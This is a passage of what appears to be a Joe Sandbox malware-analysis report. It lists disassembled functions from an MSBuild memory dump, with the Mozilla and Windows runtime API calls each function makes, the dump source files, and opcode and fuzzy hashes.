                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9116131708354DFCB109F14C489A69BBB5FB8932CF610A1DEC5557A50D770E905CBD5
                                                                                                                                                                                                                      Function 6C8D0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8D0CD5
                                                                                                                                                                                                                        • Part of subcall function 6C8BF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C8BF9A7
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8D0D40
                                                                                                                                                                                                                      • free.MOZGLUE ref: 6C8D0DCB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      • free.MOZGLUE ref: 6C8D0DDD
                                                                                                                                                                                                                      • free.MOZGLUE ref: 6C8D0DF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4069420150-0
                                                                                                                                                                                                                      • Opcode ID: 7618f58f163646890f960efa12d1b84dade98bac3657471d167069099206fb03
                                                                                                                                                                                                                      • Instruction ID: 615823f2a165501fbb36208f3a093435b44631d4547ad100b60e630df47f03fa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7618f58f163646890f960efa12d1b84dade98bac3657471d167069099206fb03
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D412575A087848BD320CF69C28079EFBE5BFC9754F118A2EE8D887710D770A485CB92
                                                                                                                                                                                                                      Function 6C8D9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D9188
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D91BB
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D91EB
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D9200
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C8D8242,?,00000000,?,6C8CB63F), ref: 6C8D9219
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4259248891-0
                                                                                                                                                                                                                      • Opcode ID: 107f78433de38dd0761d8fabe1f92db91c24301e06c0c1fb9c7b524544c9f77d
                                                                                                                                                                                                                      • Instruction ID: e2bea5e25adc4154099eb5f281f1996c5a10f263d6b04a1e54fc41324a66bfa1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 107f78433de38dd0761d8fabe1f92db91c24301e06c0c1fb9c7b524544c9f77d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5310231A006058BEF20DF68DD8476A73A9EB81314F524A2DD86BD7640EF30E915CBA1
                                                                                                                                                                                                                      Function 6C8C0800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C0838
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C8C084C
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C8C08AF
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C8C08BD
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C08D5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 837921583-0
                                                                                                                                                                                                                      • Opcode ID: 5084bba4d5fb8ed9b8a7f22ef766dbe0b54202b59b06d1532805401d522ad345
                                                                                                                                                                                                                      • Instruction ID: f19343aba818c9e4f6c354bc738e1fe0a407d0cfb7c036b325b8807f240f4f6e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5084bba4d5fb8ed9b8a7f22ef766dbe0b54202b59b06d1532805401d522ad345
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D21D370B0821E8BEB148F69CD84BAE7379EF44B49F60493CD909A7A00DB31E8048BD1
                                                                                                                                                                                                                      Function 6C891720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C8917B2
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C8918EE
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C891911
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C89194C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3725304770-0
                                                                                                                                                                                                                      • Opcode ID: 5244f3491f308e931a63626a3c8b90f0b5488c6b7df6f5e9d5f9451e22a2e523
                                                                                                                                                                                                                      • Instruction ID: 7d0c58f0985f4b3824f14fd70fe9e58118d50a157cc91995aa67bb5e08d23a7f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5244f3491f308e931a63626a3c8b90f0b5488c6b7df6f5e9d5f9451e22a2e523
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0181F374A192159FCB18CF6CC9C49AEBBB5FF89310F04496CE811ABB54DB30E945CBA1
                                                                                                                                                                                                                      Function 6C8A5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C8A5D40
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A5D67
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8A5DB4
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8A5DED
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 557828605-0
                                                                                                                                                                                                                      • Opcode ID: 1f4a5d9d8644e72306e9723bb664b2ef4d59080a7429fbac0d9797e8e32202f2
                                                                                                                                                                                                                      • Instruction ID: 3b3678e297b0e2a5b35aeb2d2cff0f824771739b323574b9168e222bae97386f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f4a5d9d8644e72306e9723bb664b2ef4d59080a7429fbac0d9797e8e32202f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC518271F042198FCF18CFACC954AAEBBB1FB85308F294A2DD811A7751C7706986CB90
                                                                                                                                                                                                                      Function 6C8E7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C8E7250
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8E7277
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8E72C4
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8E72F7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 557828605-0
                                                                                                                                                                                                                      • Opcode ID: 462af8cb2d7e8c4af1d745226c5a56384158c5b603188ecc975468999464ae88
                                                                                                                                                                                                                      • Instruction ID: 117cacf8d18cd2125914b217f1c61a6f043104101bb987b2b4a92c2ce6726e68
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 462af8cb2d7e8c4af1d745226c5a56384158c5b603188ecc975468999464ae88
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF514E71F041298FCF08CFA8C991AAEB7B1FB8A308F258A2DD855B7751C7316945CB90
                                                                                                                                                                                                                      Function 6C88CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C88CEBD
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C88CEF5
                                                                                                                                                                                                                      • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C88CF4E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 438689982-4108050209
                                                                                                                                                                                                                      • Opcode ID: 71f0073024e2edf5609b766bbeed59e4eba5fa20abd90614ad09c32bb157da34
                                                                                                                                                                                                                      • Instruction ID: 6f79afc5f567ef22a4876ead0135ed7860ff045c624ce09c4a6e991fdc1de431
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71f0073024e2edf5609b766bbeed59e4eba5fa20abd90614ad09c32bb157da34
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E512371A0021A8FCB10CF1CC490AAABBB5EF99300F198A9DD8595F756D371ED06CBE0
                                                                                                                                                                                                                      Function 6C8E77D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8E77FA
                                                                                                                                                                                                                      • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C8E7829
                                                                                                                                                                                                                        • Part of subcall function 6C8BCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C8831A7), ref: 6C8BCC45
                                                                                                                                                                                                                        • Part of subcall function 6C8BCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C8831A7), ref: 6C8BCC4E
                                                                                                                                                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C8E789F
                                                                                                                                                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C8E78CF
                                                                                                                                                                                                                        • Part of subcall function 6C884DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C884E5A
                                                                                                                                                                                                                        • Part of subcall function 6C884DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C884E97
                                                                                                                                                                                                                        • Part of subcall function 6C884290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C8C3EBD,6C8C3EBD,00000000), ref: 6C8842A9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2525797420-0
                                                                                                                                                                                                                      • Opcode ID: 9212fe0e45150d777a0a845de63b41d87f3329325642678124bd9cbe07f9b734
                                                                                                                                                                                                                      • Instruction ID: 615496db1ab139f3055d6202fcdd417090da8521ef9e568179ee02aee7c20fff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9212fe0e45150d777a0a845de63b41d87f3329325642678124bd9cbe07f9b734
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08419D719087069FD310DF29C48056AFBF4FFCA264F204A2EE4A987741DB70E959CB92
                                                                                                                                                                                                                      Function 6C8C6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C8C82BC,?,?), ref: 6C8C649B
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8C64A9
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: GetCurrentThreadId.KERNEL32 ref: 6C8BFA8D
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: AcquireSRWLockExclusive.KERNEL32(6C90F448), ref: 6C8BFA99
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8C653F
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8C655A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3596744550-0
                                                                                                                                                                                                                      • Opcode ID: 2728c9be55928ad127088ac5667100cf665101baf2b6540644e46ce488bf22e2
                                                                                                                                                                                                                      • Instruction ID: f6b367af92966ffa62256818fde5130ed34620b05db8ee942472386dc37ced3c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2728c9be55928ad127088ac5667100cf665101baf2b6540644e46ce488bf22e2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 183181B5A083059FD700CF18D98069AB7F4FF88314F10483DE85A97741DB30E919CB92
                                                                                                                                                                                                                      Function 6C8DA2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8DA315
                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C8DA31F
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?), ref: 6C8DA36A
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                        • Part of subcall function 6C8D2140: free.MOZGLUE(?,00000060,?,6C8D7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D215D
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8DA37C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 700533648-0
                                                                                                                                                                                                                      • Opcode ID: 505d950b48e9b5ca9f3ec252faf0f4459ce219ec1f3292daa540102bbfadf08e
                                                                                                                                                                                                                      • Instruction ID: e2afaa3f5adb9e5960b01a7e9dd11d74d2532412605921a466c7dbd175f90329
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 505d950b48e9b5ca9f3ec252faf0f4459ce219ec1f3292daa540102bbfadf08e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47210471A00624DBCB248F4ACA40BDEB7A9EF85358F268425ED095B700DB32FD06C7D2
                                                                                                                                                                                                                      Function 6C8BFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C8DD019,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?), ref: 6C8BFFD3
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,6C8DD019,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?,?), ref: 6C8BFFF5
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,6C8DD019,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?), ref: 6C8C001B
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C8DD019,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?,?), ref: 6C8C002A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 826125452-0
                                                                                                                                                                                                                      • Opcode ID: 81b750e2625f1870d44a00727ee2d86af1a03bd9114b228f81b3a7292b8b8f12
                                                                                                                                                                                                                      • Instruction ID: aa1eeba2b0f4abb91ce4c1c67bd3059ec2665d74aa9a5a9a9497702765a2e932
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b750e2625f1870d44a00727ee2d86af1a03bd9114b228f81b3a7292b8b8f12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 952106B6B002155BC7289F7C9DD48AFB7BAEBC53643250B38E425E7780EB709D0186D1
                                                                                                                                                                                                                      Function 6C8E7930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C89BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C8E7A3F), ref: 6C89BF11
                                                                                                                                                                                                                        • Part of subcall function 6C89BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C8E7A3F), ref: 6C89BF5D
                                                                                                                                                                                                                        • Part of subcall function 6C89BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C8E7A3F), ref: 6C89BF7E
                                                                                                                                                                                                                      • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C8E7968
